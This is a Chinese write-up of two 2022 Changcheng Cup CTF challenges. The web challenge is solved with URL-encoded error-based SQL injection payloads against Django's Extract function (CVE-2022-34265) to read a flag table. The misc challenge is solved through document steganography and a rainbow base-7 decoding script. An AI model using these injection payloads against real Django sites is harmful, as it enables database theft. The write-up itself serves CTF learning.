2022长城杯部分题目 web djangogogo| misc办公室爱情复现
web
djangogogo
首先任意加入个参数,看到报错了,这里返回了一些系统信息:
这里的环境是purchase_date,往下找,发现了extract函数,联想到Django里extract函数的sql注入漏洞。表格提示flag在FLAG表里,参考文章:CVE-2022-34265 Django Extract & Trunc SQL注入漏洞 - 网安
构造如下:
?name=year%20from%20purchase_date))%20and%20extractvalue(1,concat(1,(select%20flag%20from%20FLAG),1))%23
发现不完整,于是
?name=year%20from%20purchase_date))%20and%20extractvalue(1,concat(1,(select%20mid(flag,10,40)%20from%20FLAG),1))%23
再次构造:
两者拼接在一起,即为flag:
flag{33839a30-2c0a-45e7-884d-d38d374ad875}
Misc
办公室爱情
题目给了个zip附件,根据题目提示:
沃德应该就是word文档,皮迪符就是pdf,皮皮特就是ppt,可以看到ppt是加密的,所以要找到密码。
先对word分析,打开后是一首诗歌,未发现什么,猜测可能隐藏文字:
上面还藏一个:
可能对应沃德它的两个爱。
接着对pdf分析,是一些关于php漏洞的东西,未发现异常,盲猜pdf隐写,而上面的两个密码可能是隐写用到的密码:
password1:True_lOve_ password12:i2_supReMe //True_lOve_i2_supReMe
将pdf放进wbSteg04.3open解码,True_lOve_i2_supReMe这个是密码,得到该文件,也就是ppt的密码:
this_is_pAssw0rd@!
打开后ppt都是红橙黄绿青蓝紫的图片,这里是彩虹7进制加密。
三个三个为一组,对象出来得到:
204 213 166 205 234 100 66 226 164 203 231 124 203 100 164 454 545 236
依次转为16进制,最后在一起转为字符:
flag{10v_exCe1_..g.}
或者可以使用脚本跑出结果:
x = '黄红青白黄橙绿白橙紫紫白黄红蓝白黄绿青白橙红红白紫紫白黄黄紫白黄红绿白橙紫青白黄红绿白黄绿橙白橙黄青白黄红绿白橙红红白橙紫青白青蓝白青蓝白'
x = x.replace('红','0')
x = x.replace('橙','1')
x = x.replace('黄','2')
x = x.replace('绿','3')
x = x.replace('青','4')
x = x.replace('蓝','5')
x = x.replace('紫','6')
x = x.replace('白','_')
for i in x.split('_')[:20]: print(chr(int(i,7)),end='')
#flag{10ve_exCe1_!!!}
x为自己ppt里不同的颜色。
运行得到flag。
2022长城杯部分题目 web djangogogo| misc办公室爱情复现相关推荐
- 蓝桥杯部分题目 python实现
1.隔行变色 ''' 思路:由题意每行的颜色为 蓝 白 交替第21行到50行之间共有50-21+1=30行''' result=(50-21+1)/2 print(int(result))#15 2. ...
- [长城杯 2022]办公室爱情
[长城杯 2022]办公室爱情 复现过程如下: 先把沃德.doc复制到kali中,修改后缀名后为沃德.zip,然后解压文件. 使用grep进行匹配 grep -irE "flag|==|10 ...
- 2022年天梯赛题目解析
2022年天梯赛题目解析 L1-1 今天我要赢 (5 分)[输出水题] 题目描述 代码 L1-2 种钻石 (5 分)[四则运算] 题目描述 代码 L1-3 谁能进图书馆 (10 分)[分类讨论,判断题 ...
- 2022高压电工上岗证题目及答案
题库来源:安全生产模拟考试一点通公众号小程序 2022高压电工模拟考试题库为高压电工全部考试题库历年真题!2022高压电工上岗证题目及答案依据高压电工考试教材.高压电工试卷随时根据安全生产模拟考试一点 ...
- 【华为机试真题详解】数大雁【2022 Q2 | 100分】
文章目录 前言 详解试题 1419. 数青蛙 华为机试题. 数大雁 题目解析 数青蛙代码实现 数大雁不考虑叫声不完整的情况 数大雁考虑叫声不完整的情况 前言 <华为机试真题详解>专栏含牛客 ...
- 2022过氧化工艺上岗证题目模拟考试平台操作
题库来源:安全生产模拟考试一点通公众号小程序 2022年过氧化工艺上岗证题库系过氧化工艺理论题库模拟预测卷!2022过氧化工艺上岗证题目模拟考试平台操作根据过氧化工艺考试教材.过氧化工艺模拟考试题库随 ...
- 【CCCC】L3-009 长城 (30分),计算几何+凸包,极角排序
problem L3-009 长城 (30分) 正如我们所知,中国古代长城的建造是为了抵御外敌入侵.在长城上,建造了许多烽火台.每个烽火台都监视着一个特定的地区范围.一旦某个地区有外敌入侵,值守在对应 ...
- 2022年,树莓派搭建web服务器,加各种bug的解决
2022年,树莓派搭建web服务器,加各种bug的解决 配置: 1.树莓派3B+ 2.树莓派系统:2022-1-28 桌面版 文章目录 2022年,树莓派搭建web服务器,加各种bug的解决 一.首先 ...
- L3-009 长城 (30分)
L3-009 长城 (30分) #include <bits/stdc++.h> //#define int ll using namespace std;//#pragma GCC op ...
最新文章
- 放大 旋转 css3,CSS3详解:transform 的旋转、旋转放大、放大、移动
- 某资深互联网人分析:支付宝面临巨大困难,被微信争夺市场,年轻用户流失严重...
- 部署SD-WAN后网络安全挑战仍然存在—Vecloud
- Linux SPI总线和设备驱动架构之一:系统概述
- day 96 关于分页的使用
- php怎么查询数据库密码,如何验证php中的密码是通过mysql查询手动散列插入到数据库中的?...
- inputstream java_Java实现inputstream流的复制
- 漫步数学分析十二——嵌套
- 解说linux下proc文件系统
- 我恨Safari!!!
- php mysql完全学习手册 下载_PHP+MySQL完全学习手册
- Nacos概述,下载与安装,初始化配置,服务注册应用,RestTemplate,Feign
- “时间复杂度”的另类解释
- 计算机安全模式无法启动,我的电脑安全模式可以进去,为什么不能正常起动呢?...
- 4412——Linux驱动入门01
- 安视宝动态微表情人脸识别技术
- Jira中的全流程开发管理
- 墨刀的html压缩包是什么,墨刀如何使用?(教程介绍)
- python 生成异教徒头像
- docekerfile文件详解